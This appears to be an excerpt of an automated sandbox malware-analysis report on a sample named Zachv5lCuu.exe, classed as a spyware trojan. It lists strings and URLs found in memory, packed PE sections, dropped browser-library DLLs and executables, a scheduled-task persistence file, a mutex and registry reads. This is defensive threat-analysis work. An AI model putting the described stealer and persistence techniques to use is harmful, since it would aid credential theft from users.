Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Zachv5lCuu.exe, 25bb638aac.exe.11.dr, random[1].exe.11.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Zachv5lCuu.exe, 25bb638aac.exe.11.dr, random[1].exe.11.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: Zachv5lCuu.exe, 25bb638aac.exe.11.dr, random[1].exe.11.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1540779259.000000006CD1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Zachv5lCuu.exe, 00000000.00000002.1540092190.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1524838242.000000001D6C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecop
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecopnacl
Source: KJDAECAE.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: KJDAECAE.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, KJDAECAE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: KJDAECAE.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: KJDAECAE.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002126000.00000004.00000020.00020000.00000000.sdmp, IEHJJECBKKECFIEBGCAK.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/KoBtErivXexPAjSpGY.exe
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/BtErivXexPAjSpGY.exe
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000D76000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: Zachv5lCuu.exe, 00000000.00000003.1445026722.000000002F91A000.00000004.00000020.00020000.00000000.sdmp, HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Zachv5lCuu.exe, 00000000.00000003.1445026722.000000002F91A000.00000004.00000020.00020000.00000000.sdmp, HIDAAKEGDBFIJJKFHCFBGHCGDH.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name: .idata
Source: GHCGDAFCFH.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name:
Source: explorti.exe.9.dr Static PE information: section name: .idata
Source: explorti.exe.9.dr Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: Zachv5lCuu.exe Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: 25bb638aac.exe.11.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CD0B700
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CD0B8C0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CD0B910
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CCAF280
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA35A0 0_2_6CCA35A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB64C0 0_2_6CCB64C0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCD4D0 0_2_6CCCD4D0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAD4E0 0_2_6CCAD4E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE6CF0 0_2_6CCE6CF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB6C80 0_2_6CCB6C80
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD034A0 0_2_6CD034A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0C4A0 0_2_6CD0C4A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB5440 0_2_6CCB5440
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1545C 0_2_6CD1545C
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1AC00 0_2_6CD1AC00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE5C10 0_2_6CCE5C10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF2C10 0_2_6CCF2C10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1542B 0_2_6CD1542B
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE0DD0 0_2_6CCE0DD0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD085F0 0_2_6CD085F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBFD00 0_2_6CCBFD00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCED10 0_2_6CCCED10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD0512 0_2_6CCD0512
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD176E3 0_2_6CD176E3
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCABEF0 0_2_6CCABEF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBFEF0 0_2_6CCBFEF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD0E680 0_2_6CD0E680
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC5E90 0_2_6CCC5E90
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD04EA0 0_2_6CD04EA0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF2E4E 0_2_6CCF2E4E
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC4640 0_2_6CCC4640
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC9E50 0_2_6CCC9E50
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE3E50 0_2_6CCE3E50
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD16E63 0_2_6CD16E63
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAC670 0_2_6CCAC670
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF5600 0_2_6CCF5600
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE7E10 0_2_6CCE7E10
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD09E30 0_2_6CD09E30
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCADFE0 0_2_6CCADFE0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD6FF0 0_2_6CCD6FF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF77A0 0_2_6CCF77A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB9F00 0_2_6CCB9F00
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE7710 0_2_6CCE7710
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD150C7 0_2_6CD150C7
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCC0E0 0_2_6CCCC0E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE58E0 0_2_6CCE58E0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD60A0 0_2_6CCD60A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC8850 0_2_6CCC8850
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCD850 0_2_6CCCD850
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEF070 0_2_6CCEF070
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCB7810 0_2_6CCB7810
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEB820 0_2_6CCEB820
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCF4820 0_2_6CCF4820
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD02990 0_2_6CD02990
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE5190 0_2_6CCE5190
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAC9A0 0_2_6CCAC9A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDD9B0 0_2_6CCDD9B0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCCA940 0_2_6CCCA940
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1B170 0_2_6CD1B170
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBD960 0_2_6CCBD960
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCFB970 0_2_6CCFB970
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE8AC0 0_2_6CCE8AC0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCC1AF0 0_2_6CCC1AF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCEE2F0 0_2_6CCEE2F0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD1BA90 0_2_6CD1BA90
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD12AB0 0_2_6CD12AB0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA22A0 0_2_6CCA22A0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCD4AA0 0_2_6CCD4AA0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBCAB0 0_2_6CCBCAB0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCE9A60 0_2_6CCE9A60
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD153C8 0_2_6CD153C8
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCAF380 0_2_6CCAF380
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA5340 0_2_6CCA5340
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCBC370 0_2_6CCBC370
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCED320 0_2_6CCED320
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BFE410 11_2_00BFE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF4CD0 11_2_00BF4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C33048 11_2_00C33048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C27D63 11_2_00C27D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C36EE9 11_2_00C36EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF4AD0 11_2_00BF4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C3763B 11_2_00C3763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C32BB0 11_2_00C32BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C3775B 11_2_00C3775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C38700 11_2_00C38700
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960000 13_2_7F960000
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Code function: 13_2_7F960850 13_2_7F960850
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: String function: 6CCE94D0 appears 90 times
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: String function: 6CCDCBE8 appears 134 times
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002137000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs Zachv5lCuu.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1548910750.000000006CF25000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Zachv5lCuu.exe
Source: Zachv5lCuu.exe, 00000000.00000002.1541500166.000000006CD32000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Zachv5lCuu.exe
Source: Zachv5lCuu.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.99371337890625
Source: Zachv5lCuu.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: GHCGDAFCFH.exe.0.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: GHCGDAFCFH.exe.0.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: amadka[1].exe.0.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: explorti.exe.9.dr Static PE information: Section: ZLIB complexity 0.9980895662568307
Source: explorti.exe.9.dr Static PE information: Section: vtxlewez ZLIB complexity 0.9944682116953762
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.99371337890625
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9996189024390244
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.99371337890625
Source: 25bb638aac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: GHCGDAFCFH.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: explorti.exe.9.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/29@0/3
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CD07030
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Zachv5lCuu.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
